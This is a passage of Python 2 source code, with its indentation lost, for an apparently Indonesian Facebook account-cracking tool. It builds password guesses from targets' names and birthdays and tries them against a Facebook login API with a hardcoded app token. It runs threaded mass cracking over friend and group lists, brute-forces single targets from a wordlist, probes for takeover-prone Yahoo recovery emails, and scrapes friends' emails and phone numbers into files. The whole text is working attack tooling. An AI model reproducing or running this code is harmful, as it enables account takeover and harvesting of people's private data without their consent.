print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz5 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Sorry, opening password target failed :('
print '\x1b[1;91m[!] Try other method.'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file = open(idlist, 'r')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
global cekpoint
global gagal
global up
try:
buka = open(idlist, 'r')
up = buka.read().split()
while file:
username = file.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa = open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append('\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek = open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append('\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Connection busy'
time.sleep(0.01)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
def hasil():
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Failed \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Crack from Friends'
print '║-> \x1b[1;37;40m2. Crack from Group'
print '║-> \x1b[1;37;40m3. Crack from File'
print '║-> \x1b[1;31;40m0. Kembali'
print '\x1b[1;37;40m║'
pilih_super()
def pilih_super():
peak = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_super()
else:
if peak == '1':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id Teman \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '3':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.01)
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']
else:
pass2 = b['sayang'] + 'sayang'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + ['name']
else:
pass3 = b['doraemon'] + 'doraemon'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']
else:
pass4 = b['last_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']
else:
birthday = b['birthday']
pass5 = birthday.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']
else:
pass6 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.5)
login()
else:
os.system('clear')
print logo
print '╔' + 52 * '\x1b[1;97m\xe2\x95\x90'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mTry \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File not found...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why = raw_input('\x1b[1;91m[?] \x1b[1;92mKamu ingin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. From Friends'
print '║-> \x1b[1;37;40m2. From File'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
yahoo_pilih()
def yahoo_pilih():
go = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Can\'t empty'
yahoo_pilih()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mTidak Ditemukan'
yahoo_pilih()
def yahoofriends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token Tidak Ada'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
friends = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
kimak = json.loads(friends.text)
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mSimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total = open(files, 'r')
mail = total.readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail = open(files, 'r').readlines()
for pw in mail:
mail = pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Get ID From Friends'
print '║-> \x1b[1;37;40m2. Get Friends ID From Friends'
print '║-> \x1b[1;37;40m3. Get ID From GRUP'
print '║-> \x1b[1;37;40m4. Get Friends Email'
print '║-> \x1b[1;37;40m5. Get Friends Email From Friends'
print '║-> \x1b[1;37;40m6. Get Phone From Friends'
print '║-> \x1b[1;37;40m7. Get Friend\'s Phone From Friends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
grab_pilih()
def grab_pilih():
cuih = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Can\'t empty'
grab_pilih()
else:
if cuih == '1':
id_friends()
else:
if cuih == '2':
idfrom_friends()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_friends()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_friends()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mnot found'
grab_pilih()
def id_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_id, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def idfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
